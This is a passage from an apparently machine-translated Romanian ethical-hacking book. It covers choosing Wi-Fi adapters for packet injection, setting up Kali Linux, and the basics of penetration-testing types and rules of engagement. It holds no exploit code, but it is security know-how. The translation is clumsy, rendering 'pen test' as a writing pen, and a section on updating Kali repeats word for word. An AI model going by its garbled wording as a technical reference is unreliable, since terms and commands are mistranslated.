împotriva lor. Asta nu pentru că chipsetul nu este bun, ci
pentru că nu poate vedea trafic de 5 gigaherți.
Dacă doriți să obțineți un adaptor care utilizează acest chipset, atunci aveți două
opțiuni. Ei bine, aveți multe opțiuni, dar voi vorbi despre două. În primul rând,
există o opțiune ieftină prin care puteți obține un adaptor wireless fără marcă care
utilizează acest chipset și îl puteți folosi pentru a face toate atacurile pe care tocmai le-am
menționat.
Singurul lucru este că acest adaptor nu are marcă, deci este puțin mai ieftin. A
doua opțiune este să obțineți un adaptor wireless Alpha AWUS036NHA, care este fabricat
de alpha, care este o companie foarte populară și continuă să producă
adaptoare fără fir grozave.
Are același chipset și va avea aceeași compatibilitate. Singura
diferență este calitatea construcției. Acesta este un produs de o calitate mult mai mare
realizat de
o companie foarte buna.
Ambele funcționează foarte bine, dar singura diferență este că
adaptorul Alpha are o rază de acțiune mai mare și este mai fiabil. Adaptoarele de buget sunt
mult
mai mici, mult mai compacte, așa că dacă vă aflați într-un loc public este mult mai ușor de
utilizat decât cel Alpha, care este mare și are antenă mare.
Următorul chipset despre care vreau să vorbesc este realizat de compania numită Realtek.
Modelul este RTL8812AU. Acest chipset a primit suport de Kali
Linux doar în versiunea 1 din 2017 și acest chipset acceptă și modul monitor,
injecția de pachete și frecvența de 2,4 și 5 gigaherți.
Singura problemă cu acest chipset este că nu pare la fel de fiabil, deoarece unele
dintre atacuri ar putea avea nevoie de un semnal mai puternic, unele dintre atacuri vor eșua și
va trebui să o faceți din nou și, uneori, cardul va fi deconectat.
apoi trebuie să-l conectați din nou.
Acest chipset are încă o dată două opțiuni. Puteți obține un
adaptor wireless de buget, care este mult mai ieftin decât cel Alpha și are doar același
chipset, sau puteți obține Alpha, care este o companie foarte bună, cu o
reputație bună și este un adaptor mai puternic, așa că veți ajunge la rețele mai îndepărtate
, pentru că vei avea un semnal mai puternic.
Cu adaptorul Alpha care utilizează acest chipset este Alpha AWUS036ACH. Puteți
continua să comparați specificațiile lor și să obțineți cel potrivit pentru dvs.
Cel mai important lucru este chipsetul. Nu este marca. Cele de buget
sunt mult mai ieftine.
Sunt mai compacte, deci sunt mai bune. Le poți folosi mai bine în public,
dar nu sunt la fel de puternice ca cele Alpha. Cele alfa vă vor oferi
un semnal mai bun, deci vor fi mai fiabile, dar și cele bugetare vor funcționa
perfect. Toți vor sprijini multe atacuri de penetrare.
Singura diferență este doar calitatea construcției. În ceea ce privește compatibilitatea,
adaptoarele bugetare
vor funcționa la fel de bine ca și cele Alpha, deoarece folosesc același
chipset. Încă o dată, cel mai important lucru este chipsetul care este folosit în interiorul
adaptorului wireless.
Capitolul 3 Instalarea Virtual Box și Kali Linux
Virtual Box este un software specializat în virtualizarea diferitelor
sisteme de operare pe care le puteți instala pe Windows, Macintosh sau orice Linux, precum și
pe
sistemele de operare Solaris. Este gratuit de descărcat. Odată ce ați ajuns
pe site puteți alege să descărcați diferite pachete de platformă.
După ce ați descărcat Virtual Box, veți putea construi și rula
mai multe VM-uri (mașini virtuale). Manualele de utilizare despre cum să instalați
Virtual Box, totul se află pe site-ul lor, care a fost deja enumerat în
capitolul anterior. Utilizarea software-ului este simplă și se recomandă să rulați Kali
Linux pe el.
Puteți folosi un alt mediu virtual similar, cum ar fi vmWare, dar
personal ați folosit Virtual Box de mulți ani, prin urmare, la asta mă voi
referi în această carte.
Kali Linux este o distribuție Linux a sistemului de operare pe care îl puteți
utiliza atât ca sistem de operare principal, cât și pe care îl puteți rula virtual. Îl puteți rula sub
formă de DVD sau chiar de pe USB. După ce ați descărcat fișierul ISO,
îl puteți instala în partea de sus a sistemului dvs. de operare existent.
Kali Linux este cel mai bun kit de instrumente/software de testare a penetrației, care are
sute de instrumente încorporate, gata de utilizat pentru testarea de penetrare în orice
rețea. Kali Linux este să testeze o rețea existentă și să încerce să găsească
posibile vulnerabilități, astfel încât securitatea generală a rețelei să poată fi îmbunătățită.
Kali Linux este, de asemenea, ușor de utilizat, iar categoriile de instrumente încorporate în
acesta sunt pentru
culegerea de informații, criminalistică, inginerie inversă, testarea stresului,
evaluarea vulnerabilității, instrumente de raportare, instrumente de exploatare,
escularea privilegiilor, menținerea accesului și multe altele.
Odată ce ați descărcat Kali Linux și gata să-l instalați într-un
mediu virtual, există câteva detalii pe care ar trebui să le cunoașteți. Când
creați o nouă mașină virtuală pentru Kali, trebuie să alocați cel puțin 4 Gb de
spațiu și încă 20 Gb pentru hard diskul virtual.
După ce ați construit o nouă mașină virtuală completă, trebuie să mergeți la
setări și să vă asigurați că ajustați setările de rețea alegând conectarea
mașinii virtuale la router. Odată ce ați terminat cu setările, ar trebui să puteți
porni imaginea. Comanda pe care trebuie să o introduceți este
„startx”,
apoi apăsați enter. Aceasta va începe instalarea GUI (Graphical User Interface)
de pe hard disk, care este de asemenea recomandat. Până la instalarea GUI,
există câteva întrebări la care trebuie să răspundeți, cum ar fi
setările de limbă, tastatură, locație și ceas pentru fusul orar.
Odată ce instalarea este finalizată, trebuie să reporniți imaginea pentru a porni de pe
hard disk. După finalizarea repornirii, Kali va cere detalii de conectare pe
CLI (Command Line Interface). Pentru numele de utilizator, tastați
„root”
, iar pentru parolă, tastați
„toor”
și apăsați Enter. Dacă sunteți nou în CLI și nu știți nicio comandă și ce
să tastați, nu vă faceți griji. Puteți oricând să comutați la GUI tastând
comanda
„startx”
și apăsând enter. Aceasta va deschide interfața grafică ușor de utilizat, care vă va permite să
aveți
acces la toate instrumentele de testare a stiloului pe care le vom discuta mai târziu. Alte
setări de bază pe care trebuie să le faceți sunt adresarea IP.
Kali Linux caută în mod implicit o adresă IP a DHCP-ului dvs., dar este
recomandat să atribuiți o adresă IP statică, astfel încât să nu vă pierdeți ce IP
reprezintă ce mașină. Comanda CLI de care aveți nevoie pentru a atribui o
adresă IP pe Kali este:
„Ifconfig eth0 10.10.10.2/24 up”
Apoi, trebuie să configurați gateway-ul implicit, care este
adresa IP a routerului dumneavoastră. Pentru a face asta, tastați comanda:
„Route add default gw 10.10.10.1”
Odată ce aceste setări sunt finalizate, trimiteți ping la adresa IP a routerului, tastând comanda
:
„Ping 10.10.10.1”
După ce aveți acces la gateway-ul implicit și puteți să accesați
internetul cu acel router, ar trebui să testați conectivitatea la internet tastând comanda
:
„Ping www.google.com”
Dacă acest lucru are succes, înseamnă că Kali Linux instalat virtual este
conectat la internet. Motivul pentru care aveți nevoie de acces la internet este pentru că doriți
să vă actualizați Kali Linux.
Actualizarea Kali Linux este prioritatea ta. Prima sarcină pe care ar trebui să
o efectuați după o instalare curată este actualizarea sistemului de operare. Advanced
Packaging Tools, alias APT extinde funcționalitățile pachetelor Debian prin
căutarea în depozite și prin instalarea sau actualizarea pachetelor împreună cu toate
dependențele necesare.
Deschideți consola și tastați „apt-get update”, care este folosit pentru a resincroniza
fișierele index ale pachetelor locale cu sursa lor, așa cum este definită în
fișierul cu lista de surse. Comanda de actualizare trebuie folosită întotdeauna mai întâi, înainte
de a efectua o
actualizare sau o actualizare de distribuție.
În continuare, trebuie să actualizați Kali lansând opțiunea „--y”, care continuă
cu instalarea fără bătaia de cap de a scrie da de fiecare dată. Deci, ce
înseamnă apt-get upgrade?
Ei bine, este folosit pentru a instala cele mai noi versiuni ale tuturor pachetelor instalate pe
sistem. Deci pachetele existente pe Kali cu versiuni noi disponibile sunt
actualizate. Este important de reținut că comanda de actualizare nu va modifica sau
șterge pachetele care nu sunt actualizate și nu va instala pachete
care nu sunt deja prezente.
În cele din urmă, trebuie să executați comanda „actualizare distribuție”. Această
comandă actualizează toate pachetele instalate în prezent pe sistem și
dependențele acestora.
De asemenea, elimină pachetele învechite din sistem. Următorul lucru pe care trebuie
să-l faceți este să reporniți mașina. După repornirea mașinii, acum aveți
o versiune proaspătă curată de Kali.
Pentru a lista pachetele Debian instalate pe mașina dvs., veți rula următoarea
comandă: „sudo apt list –installedX”
Dacă există o mulțime de pachete și doriți să știți dacă un anumit instrument este deja
instalat, puteți filtra rezultatele adăugând Argumentul „filtru grep”.
Pentru a afișa o descriere completă a unui pachet și a identifica dependențele acestuia, rulați
următoarea
comandă: „dpkg --status packagename”
Și, în final, pentru a elimina un pachet din Kali, ar trebui să executați
următoarea comandă; „sudo apt-get remove name → un-install package“
Desigur, trebuie să înlocuiți numele pachetului cu numele aplicației dumneavoastră.
În cele din urmă, vreau să vă explic modul în care sistemul dumneavoastră utilizează
depozitele oficiale Kali. Toată magia se întâmplă în fișierul „sources.list”.
Puteți arunca o privire la acel fișier deschizându-l folosind panoul de frunze ori de câte ori
executați
comanda de actualizare, Kali caută în conținutul acestui fișier pentru a
efectua procesul de actualizare.
Actualizarea Kali Linux este prioritatea ta. Prima sarcină pe care ar trebui să
o efectuați după o instalare curată este actualizarea sistemului de operare. Advanced
Packaging Tools, alias APT extinde funcționalitățile pachetelor Debian prin
căutarea în depozite și prin instalarea sau actualizarea pachetelor împreună cu toate
dependențele necesare.
Deschideți consola și tastați „apt-get update”, care este folosit pentru a resincroniza
fișierele index ale pachetelor locale cu sursa lor, așa cum este definită în
fișierul cu lista de surse. Comanda de actualizare trebuie folosită întotdeauna mai întâi, înainte
de a efectua o
actualizare sau o actualizare de distribuție.
În continuare, trebuie să actualizați Kali lansând opțiunea „--y”, care continuă
cu instalarea fără bătaia de cap de a scrie da de fiecare dată. Deci, ce
înseamnă apt-get upgrade?
Ei bine, este folosit pentru a instala cele mai noi versiuni ale tuturor pachetelor instalate pe
sistem. Deci pachetele existente pe Kali cu versiuni noi disponibile sunt
actualizate. Este important de reținut că comanda de actualizare nu va modifica sau
șterge pachetele care nu sunt actualizate și nu va instala pachete
care nu sunt deja prezente.
În cele din urmă, trebuie să executați comanda „actualizare distribuție”. Această
comandă actualizează toate pachetele instalate în prezent pe sistem și
dependențele acestora.
De asemenea, elimină pachetele învechite din sistem. Următorul lucru pe care trebuie
să-l faceți este să reporniți mașina. După repornirea mașinii, acum aveți
o versiune proaspătă curată de Kali.
Pentru a lista pachetele Debian instalate pe mașina dvs., veți rula următoarea
comandă: „sudo apt list –installedX”
Dacă există o mulțime de pachete și doriți să știți dacă un anumit instrument este deja
instalat, puteți filtra rezultatele adăugând Argumentul „filtru grep”.
Pentru a afișa o descriere completă a unui pachet și a identifica dependențele acestuia, rulați
următoarea
comandă: „dpkg --status packagename”
Și, în final, pentru a elimina un pachet din Kali, ar trebui să executați
următoarea comandă; „sudo apt-get remove name → un-install package“
Desigur, trebuie să înlocuiți numele pachetului cu numele aplicației dumneavoastră.
În cele din urmă, vreau să vă explic modul în care sistemul dumneavoastră utilizează
depozitele oficiale Kali. Toată magia se întâmplă în fișierul „sources.list”.
Puteți arunca o privire la acel fișier deschizându-l folosind panoul de frunze ori de câte ori
executați
comanda de actualizare, Kali caută în conținutul acestui fișier pentru a
efectua procesul de actualizare.
Acum este timpul să enumerați câteva instrumente importante care v-ar putea fi de mare
ajutor ca
tester de penetrare. Prima din listă se numește aplicație de preîncărcare.
Pentru a instala acest pachet, executați următoarea comandă:
„sudo apt-get install preload”
Aplicația de preîncărcare identifică programele cele mai frecvent utilizate de utilizator și
preîncarcă binare și dependențe în memorie pentru a oferi acces mai rapid. Funcționează
automat după prima repornire, după instalare.
Următorul tău instrument se numește „bleachbit”. Bleachbit eliberează spațiu pe disc și
îmbunătățește
confidențialitatea prin eliberarea memoriei cache, ștergerea cookie-urilor, ștergerea istoricului
internetului,
distrugerea fișierelor temporare, ștergerea jurnalelor și eliminarea altor
fișiere inutile. Această aplicație are câteva caracteristici avansate, cum ar fi distrugerea
fișierelor pentru
a preveni recuperarea și ștergerea spațiului liber pe disc pentru a ascunde urmele fișierelor
care
nu au fost șterse complet. Comanda de care aveți nevoie pentru a instala bleachbit este:
„sudo apt-get install bleachbit”
Următorul program este managerul de pornire. Fiecare aplicație care se execută
folosind procesul de pornire încetinește sistemul. Acest lucru poate afecta utilizarea memoriei
și performanța sistemului. Puteți instala „managerul de pornire” pentru a dezactiva
serviciile și aplicațiile inutile care sunt activate în timpul pornirii.
Comanda de care aveți nevoie pentru ao instala este:
„sudo apt-get install bum”
Următoarea aplicație pe care ar trebui să o cunoașteți și să o instalați se numește „gnome-do”.
Dacă
vă place să executați aplicații de la tastatură, „gnome-do” este
instrumentul potrivit pentru dvs. Comanda de care aveți nevoie pentru a instala acest
instrument este:
„sudo apt-get install gnome-do”
Următorul dumneavoastră software din listă este „fișierul apt”. Acesta este un instrument de
linie de comandă pentru
a căuta în pachetele sistemului de ambalare „apt”. Vă permite să listați
conținutul unui pachet fără să îl instalați sau să îl preluați. Comanda de care aveți
nevoie pentru a-l instala este:
„apt-get install apt-file”
Odată ce ați instalat pachetul, trebuie să îl actualizați folosind comanda
:„
„apt-file update”
Următoarea aplicație pe care trebuie să o instalați este numit „Scrub”.
Această aplicație este un program de ștergere securizat pentru compilare conform
standardelor guvernamentale. Comanda
de care aveți nevoie pentru a instala acest instrument este:
„sudo apt-get install scrub”
Apoi, trebuie să instalați „Shutter”. Shutter este un instrument de captură de ecran care
captează
imagini de pe desktop. Comanda de care aveți nevoie pentru a instala acest instrument
este:
„apt-get install shutter”
Următorul software pe care ar trebui să-l instalați se numește „Figlet”. Acest program va
face consola dumneavoastră să arate profesională, afișând un mesaj personalizat, cum ar fi
numele companiei dvs., de exemplu. Comanda de care aveți nevoie pentru a instala
acest instrument este:
„apt-get install figlet”
Apoi, trebuie să editați „fișierul bashrc”, derulând până la sfârșitul fișierului și
tastați „figlet message”. Apoi, salvați, închideți și reporniți consola, iar data
viitoare când vă conectați înapoi la sesiunea de consolă, primul lucru pe care ar trebui să-l
vedeți
este mesajul pe care l-ați furnizat.
Apoi, trebuie să fiți conștienți de SSH, alias configurația Secure Shell. Kali
vine cu chei SSH implicite, dar înainte de a începe să utilizați SSH pe Kali, este
o idee bună să dezactivați cheile implicite și să generați un set de chei unic. Procesul
de mutare a cheilor originale și de generare a noului set de chei este
următorul. Mai întâi, deschideți consola și schimbați directorul în folderul SSH.
NOTĂ: Iată câteva ajutoare despre cum să navigați în directoare;
Pentru a reveni imediat la directorul principal, utilizați cd ~ SAU cd
Pentru a schimba în directorul rădăcină al sistemului de fișiere Linux, utilizați cd /.
Pentru a intra în directorul utilizatorului rădăcină, rulați cd /root/ ca utilizator rădăcină.
Pentru a naviga cu un nivel de director în sus, utilizați cd ..
Pentru a reveni la directorul anterior, utilizați cd -
Apoi, trebuie să creați un folder de rezervă și trebuie să mutați tastele SSH
în acel folder de rezervă.
NOTĂ: Comanda cp este o comandă Linux pentru copierea fișierelor și
directoarelor. Sintaxa este următoarea:
cp sursă destinație
cp dir1 dir2
cp -opțiune sursă destinație
cp -opțiune1 -opțiune2 sursă destinație
În exemplul următor copiați folderul /home/test/paper/ și toate fișierele acestuia în
directorul /usb/backup/, utilizați următoarea comandă:
cp -avr /home/test/paper /usb/backup
-a: Păstrați atributele specificate, cum ar fi directorul și modul fișierului,
proprietatea, marcajele de timp, dacă este posibil atribute suplimentare: context, linkuri, xattr,
toate.
-v : Ieșire detaliată.
-r : Copiați directoare recursiv.
În cele din urmă, trebuie să generați noul set de chei, prin urmare utilizați următoarea
comandă:
„dpkg-reconfigure openssh-server”
În continuare, veți vedea următoarele mesaje, care indică faptul că cheile dvs. ssh
sunt generate:
Crearea cheii SSH2 RSA; acest lucru poate dura ceva timp...
Crearea cheii SSH2 DSA; acest lucru poate dura ceva timp...
Crearea cheii SSH2 ECDSA; acest lucru poate dura ceva timp...
În continuare, trebuie să verificați hashurile cheilor ssh utilizând următoarea comandă:
„md5sum ssh_host_*”
Aici * reprezintă noile chei, deci comparați aceste hashuri folosind următoarele
comenzi:
„cd default_kali_keys/”
„md5sum *”
După regenerarea perechilor de chei SSH, puteți porni serviciul SSH prin
/usr/sbin/sshd din CLI.
După ce ați pornit SSH, dacă doriți să verificați dacă serviciul rulează,
efectuați o interogare „netstat”. Din rezultat, ar trebui să vedeți că SSH
ascultă acum pe portul 22.
Capitolul 4 Introducere în testarea de penetrare
Am discutat deja despre elementele de bază ale Linux, în special Kali Linux, precum și despre
ce software și hardware suplimentar ați putea avea nevoie ca
Hacker Etic. Cu toate acestea, în loc să sari direct pe linia de comandă a lui Kali sau pe
interfața grafică cu utilizatorul, ar trebui să știi mai multe despre proceduri odată ce te angajezi
ca Hacker Etic.
Prin urmare, mai întâi, ne vom uita la înțelegerea testării de penetrare și a
modului în care funcționează în ceea ce privește recunoașterea și amprenta. După aceea, vom
discuta despre cum să testăm stiloul și cum să vă scanați țintele.
În primul rând, trebuie să înțelegem de ce testăm stiloul în primul rând. Poate
părea o întrebare evidentă, dar vă vom oferi mai multe detalii aici. În continuare,
vom vorbi despre diferitele tipuri de teste de stilou, dar nu există doar
tipuri diferite, ci și diferite persoane care sunt implicate, de care ar trebui să fii conștient.
Apoi vom trece prin cele trei etape diferite ale testării stiloului, astfel încât să
înțelegeți pe deplin care sunt acestea. Ne vom uita la etapa pre-atac, în care petrecem
mult timp pentru că vrem să setăm niște parametri, precum și să
ne protejăm legal.
Apoi ne vom uita la etapa 2, unde ne vom uita la lucrurile pe care le vom face în timpul
atacului. După aceea, ne vom uita la pașii post-atac și vom vorbi despre
standardele pe care trebuie să le urmați.
Unele dintre standarde sunt realizate de producători, iar unele dintre ele sunt
standarde deschise, așa că va trebui să decideți pe care doriți să le urmați în funcție de
ceea ce încercați să realizați. Odată ce ați găsit standardul pentru dvs.,
rămâneți la el.
Dar la întrebare; „De ce testăm în primul rând?” Ei bine, aceasta pare
o întrebare ușoară sau că ați crede că răspunsul este destul de
simplu, dar există câteva motive pentru care facem teste de stilou.
În primul rând, dorim să evaluăm profilul de securitate actual al
organizației prin simularea unui atac pentru a afla ce vulnerabilități
ar putea exploata un atacator rău intenționat.
Un alt motiv legitim pentru care facem testul stiloului este crearea unor măsuri de securitate.
Din moment ce
urmărim rețeaua, nu are sens să mergem mai departe și să ne dăm seama
sau poate să ne reproiectăm actualele mecanisme de securitate?
Mulți oameni consideră că pen-testul este conceput pentru a evidenția vulnerabilități, dar
nu vom sublinia doar vulnerabilitatea, ci trebuie să evidențiem și efectele
pe care slăbiciunea sau vulnerabilitatea le prezintă companiei.
După finalizarea unui test pe stilou, putem livra un raport cuprinzător cu
detaliile a tot ceea ce am descoperit. De asemenea, puteți argumenta că
testarea stiloului este concepută nu doar pentru a arăta lacunele din modelul dvs. de
securitate, dar poate
beneficia și de recuperarea în caz de dezastru și planificarea continuității afacerii.
Scopul este de a simula metodele pe care atacatorii rău intenționați le-ar utiliza pentru a
încerca să obțină acces neautorizat la rețeaua dvs.
În primul rând, doriți să vă asigurați că enumerați obiectivele testului stilou.
Unele companii pot avea nevoie sau nu de anumite elemente testate. Stabilirea
parametrilor pentru acele teste ar trebui să fie principalul obiectiv, precum și limitările sau
justificările atacului acestor sisteme.
Un alt mod prin care vă puteți asigura că efectuați un test decent este să
urmați o metodologie, iar despre metode vom vorbi mai târziu, dar doriți să vă
concentrați pe una, deoarece majoritatea planurilor vă vor asigura că vă acoperiți toate
bazele.
Documentarea este un alt factor vital al unui pen-test decent. Dorim să ne asigurăm
că clientul poate înțelege despre ce vorbim, iar testatorul de stilouri
trebuie să se asigure că este disponibil pentru a răspunde la orice întrebări care ar putea
apărea din raportul de testare a stiloului documentat.
O altă modalitate prin care te poți asigura că faci un test decent este să dovedești că
ai instrumentele potrivite. Unele dintre aceste instrumente vor fi proprietare, altele open-
source, unele dintre ele vor face lucruri pentru dvs. automat, altele pot
include scripturi, precum și doar interfețe standard de linie de comandă.
O altă modalitate prin care vă puteți asigura că aveți un test decent pentru stilou este să
alegeți cine este implicat. S-ar putea să nu faci asta singur. Dacă o faci
singur, vrei să te asiguri că tu și toți ceilalți implicați în
testul stiloului sunt un tester de penetrare legitim care respectă regulile acordurilor de
nedivulgare
.
Acest lucru este important dacă sunteți angajat să faceți un pen-test care ar putea distruge o
companie. Este treaba ta, responsabilitatea și integritatea ta să te asiguri că
contribui la protejarea clientului.
De asemenea, doriți să vă asigurați că nu doar să subliniați ce este în neregulă, ci când
raportați
constatările, oferiți câteva recomandări cu privire la ceea ce trebuie făcut
sau ce ar putea fi făcut pentru a remedia problema.
Oferiți soluții tot timpul. Pe lângă principalele patru motive pentru a efectua un
test de stilou, există și alte câteva motive pe care ar trebui să le cunoașteți.
Una dintre ele ar putea fi în ceea ce privește încercarea de a veni cu modificări care
trebuie făcute infrastructurii dvs. pentru a vă face mai sigur, indiferent
dacă este vorba despre hardware sau software, sau chiar dacă este vorba de designul rețelei.
De asemenea, putem folosi rezultatele testării stiloului pentru a crea pași de pregătire pentru a
ajuta la
prevenirea exploatărilor. Un alt motiv este să ne uităm la
eficiența mașinilor de rețea, apoi să le evaluăm, chiar dacă acele
mașini sunt firewall-uri, routere, comutatoare, servere web, servere de fișiere.
De asemenea, vom folosi rezultatele testării stiloului pentru a confirma apărările noastre de
securitate și controalele
pe care le avem. De exemplu, pentru că ați avut un test de stilou
în urmă cu 3 luni, asta nu înseamnă că nu s-a schimbat altceva în
rețeaua dvs.
De asemenea, rezultatele testării stiloului ne-ar putea beneficia în crearea de echipe sau
management care să ne ajute să ne concentrăm asupra unor vulnerabilități și probleme de
securitate specifice
pentru a pregăti oamenii care sunt responsabil de acele sisteme.
De asemenea, vom folosi rezultatele testării stiloului pentru a ne ajuta să identificăm
amenințările cu care se
confruntă activele organizației noastre, iar acest lucru se va schimba, deoarece diferite
companii sunt într-o industrie diferită.
De exemplu, spitalele vor analiza diferite mecanisme de securitate
față de o afacere mică. Pentru a reduce cheltuielile organizației pentru
securitatea IT și pentru a îmbunătăți rentabilitatea investiției sau rentabilitatea investiției
atunci când vine vorba de
acele dispozitive de securitate, trebuie să identificăm și să remediam vulnerabilitățile și
punctele slabe.
Putem folosi, de asemenea, rezultatele testării stiloului pentru a crea politici, proceduri,
implementări și noi modele. De asemenea, putem folosi acest tip de raport pentru a
ne ajuta să dezvoltăm sisteme, procese, execuții și planuri pentru compania noastră.
Și să nu uităm că anumite companii trebuie să-și facă griji cu privire la
reglementări specifice. În sfârșit, să vină cu cele mai bune practici atât pentru
reglementările legale, cât și pentru cele industriale; nu este nimic mai rău decât să ai o
încălcare a datelor și să fii dat în judecată
printr-un proces colectiv din partea clienților tăi, deoarece nu ai reușit să arăți
că ai încercat să le protejezi datele.
Veți citi o mulțime de termeni diferiți utilizați atunci când vine vorba de
diferite tipuri de teste, cum ar fi un audit de securitate sau
evaluarea vulnerabilităților, în timp ce încă vorbim despre testarea stiloului.
Unii oameni ar putea folosi toți acești termeni în mod interschimbabil, dar există unele
diferențe considerabile, cum ar fi un audit de securitate verifică dacă afacerea
respectă un set de politici și proceduri de securitate standard.
Evaluarea vulnerabilităților se concentrează pe descoperirea vulnerabilităților în interiorul
rețelei, dar nu oferă nicio indicație dacă vulnerabilitățile pot fi exploatate
sau cantitatea de daune pe care le-ar putea rezulta.
În rezumat, un test pe stilou este o abordare sistematică a evaluării securității care
include și auditul de securitate și demonstrează dacă atacatorul poate
exploata cu succes punctele slabe ale sistemelor.
Când vine vorba de testarea stiloului, veți auzi, de asemenea, diferite tipuri de
echipe și, deoarece există două tipuri de grupuri, permiteți-mi să vă explic ce este fiecare
.
Prima este cunoscută ca o echipă roșie. O echipă roșie este cunoscută și sub denumirea de
echipa de agresori. Aceasta este o echipă de hackeri etici care efectuează
teste de penetrare pe sistemele dvs. fără acces sau fără acces la
resursele interne ale organizației.
Echipele roșii atacă cu sau fără avertisment, iar echipa roșie poate include
unii administratori de sistem din diferite departamente din cadrul
organizației.
Celălalt tip de echipă este cunoscut sub numele de echipa albastră. Echipa albastră este o
echipă defensivă. Echipa albastră are acces la toate resursele
și informațiile organizaționale.
Rolul lor principal este să detecteze și să încerce să atenueze activitățile echipei roșii
și să anticipeze modul în care ar putea avea loc un atac surpriză. Echipa albastră poate
include unii administratori de sistem și personal IT standard. Este cea mai puțin
costisitoare și cea mai frecventă abordare de evaluare.
Când vine vorba de tipurile de pen-testuri, totul depinde de
abordarea dvs. și de câte informații aveți sau pe care vi le oferă organizația
înainte de începerea testelor.
Mai mult, depinde și dacă pen-testele sunt interne sau externe.
Le rezumam într-o cutie albă.
Un test cu stilou cu casetă albă înseamnă că avem o cunoaștere completă a
infrastructurii, iar când spun experiență cuprinzătoare, clientul sau compania
va furniza o topologie de rețea, inclusiv toate diagramele,
inventarele activelor, precum și inventarele software ale acestora.
O companie va face acest tip de test atunci când dorește un audit complet al
securității sale. În ciuda tuturor acestor lucruri, securitatea informațiilor este un proces
continuu, iar
testarea stiloului ne oferă o imagine instantanee a poziției de securitate a acelei companii la
acel moment.
Un alt tip de test este testul cutie neagră. Acesta este împărțit în două tipuri de
teste. Unul este cunoscut ca un test orb. Într-un test orb, testerul stiloului nu știe
nimic despre companie sau țintă, dar ținta este informată cu privire la
sfera auditului, adică ce, cum și când va testa testatorul.
Într-un test orb, atacatorul va simula acțiunile, procesele, precum și
procedurile pe care le-ar lua un atacator real. Vom face niște
recunoașteri, niște amprente, niște scanări și, de asemenea, vom analiza câteva
informații disponibile public.
Testele oarbe sunt mai consumatoare de timp și mai costisitoare din cauza timpului.
Celălalt tip de test cu casetă neagră este cunoscut sub numele de dublu-orb.
Acest lucru este, de asemenea, cunoscut sub numele de testare a cunoștințelor zero, astfel
încât nici testatorul stiloului nu
știe despre țintă, nici ținta nu este informată cu privire la domeniul de aplicare al auditului, așa

nu știu ce, nici cum.
Aceasta este una dintre cele mai populare evaluări care sunt folosite astăzi datorită
aspectului că testează cunoștințele tuturor.
Avem și ceva numit cutie gri. Aceasta este o combinație de
testare atât a cutiei negre, cât și a cutiei albe. Acest tip de test este atunci când atacatorul are
cunoștințe parțiale, cum ar fi un nume de domeniu al serverelor.
Acestea ajută la economisirea de timp față de cutia neagră. Este doar o economie de timp
pentru
noi, deoarece într-o cutie neagră, este doar o chestiune de timp până să
te recunosc în mod corespunzător și să ajung în acea zonă gri.
Presupunerea că veți face acea muncă, poate oferi, de asemenea,
ceea ce este cunoscut sub numele de perspectivă duală, care oferă o inspecție completă a
sistemului
atât din perspectiva dezvoltatorului, cât și din perspectiva atacatorului.
Deci, am putea ataca din exterior, precum și să simulăm un atac din interior din partea
unui angajat nemulțumit. Există câteva abordări diferite pe care le
puteți lua.
În primul rând, puteți implementa o strategie anunțată. În această abordare,
testerul stiloului ar trebui să poată obține o imagine de ansamblu completă a infrastructurii
organizației și apoi să i se acorde și acces fizic.
Problema aici este că are un impact mai mic asupra rețelei pentru că știi
că vin.
Când vine vorba de o abordare neanunțată, aceasta este benefică atunci când
vine vorba de testarea cunoștințelor personalului de securitate, precum și
de examinarea atacurilor de inginerie socială ale organizațiilor.
Într-o abordare neanunțată, doar managementul de vârf este conștient de aceste teste
și că acestea vor avea loc. Băieții IT standard, cum ar fi
Service Desk, Echipa de infrastructură sau Echipa de aplicații nu au idee când
va veni.
Acest lucru tinde să aibă un impact mai semnificativ și, de asemenea, necesită un
proces strict de ceea ce urmează să fie făcut. Scopul real al unei
abordări neanunțate este de a testa vigilența infrastructurii și cât de receptiv
este personalul IT.
Capitolul 5 Testarea stiloului în etapa 1
Etapa 1 a testării stiloului este cunoscută și sub denumirea de pre-implicare, iar această etapă
se concentrează
pe colectarea cât mai multor informații despre ținta dvs. Acest lucru se poate
face folosind tehnici precum scanarea sau amprenta la sol.
Trebuie să-ți stabilești limitele și asta vrei mai întâi să vină
, dar la fel ca în armată, există reguli de angajamente. De exemplu,
personalului militar nu le este permis să tragă, decât dacă este tras asupra lor.
Pentru că văd pe cineva cu o armă, nu înseamnă că poate
merge înainte și trage. Totul depinde de războiul în care se află. Fiecare ar
avea propriile reguli de angajare și aici este același lucru.
Creați permisiunea formală pentru a efectua testul de penetrare, iar în
regulile de angajare, puteți specifica dacă faceți sau nu
activități tehnice sau non-tehnice.
Regulile de angajare definesc în mod explicit aceste activități. Un
profesionist în securitate care face un test de stilou i se poate permite să facă anumite
activități
care, în general, sunt considerate ilegale.
Unele reguli de implicare doresc să includă intervalul de adrese IP pe care
aveți voie să îl testați. Nu ieșiți din intervalul sau orele pe care le-
a efectuat testul în timpul programului de lucru sau după programul de lucru.
S-ar putea să vă gândiți; „Testul stiloului ar putea avea loc oricând?” Ei bine, da, dar
totul depinde dacă ați făcut o simulare a unui atac cu caseta gri din
interior, de exemplu, pentru că asta s-ar putea face strict în timpul programului de lucru.
De asemenea, doriți să aveți o listă de gazde pe care clientul sau departamentul le poate
considera restricționate. Dacă vedeți o adresă IP care nu este pe lista dvs.,
nu o atingeți!
Veți enumera, de asemenea, metodele de testare acceptabile, cum ar fi ingineria socială,
atacul de denial of service, ce instrumente vor fi folosite, spargerea parolelor,
sniffer de rețea și așa mai departe.
Dacă veți folosi instrumentul numit „Nmap”, de exemplu, va fi o
scanare Nmap agresivă sau o scanare Nmap privată? De asemenea, trebuie să specificați
durata testului.
În funcție de testul în sine sau de ceea ce ați fost de acord;
realizarea unor teste cu stiloul injector (pen) poate dura până la două până la trei luni. În mod
similar, oricine face parte din
echipa de penetrare ar putea avea un punct de contact dacă există o situație de urgență
.
De asemenea, doriți să enumerați câteva măsuri pentru a preveni apelarea forțelor de ordine
cu alarme false care pot fi create de test, mai ales dacă este un
test fizic.
Regulile dvs. de implicare ar trebui să includă, de asemenea, modul în care să gestionați
informațiile pe care
le-ați adunat. Una dintre premisele pe care ar trebui să le aveți atunci când faceți un
test de stilou pentru o companie, este ca acestea să vă pună la dispoziție un laptop.
Nu este un laptop pe care să-l păstrezi, dar este un laptop pe care îl poți folosi în timpul
testului pe stilou, inclusiv al raportării.
După ce ați terminat cu testul stiloului, le întoarceți laptopul înapoi cu
instrucțiuni, iar ei vor să stocheze laptopul pentru eventuale
teste viitoare ale stiloului ca urmare.
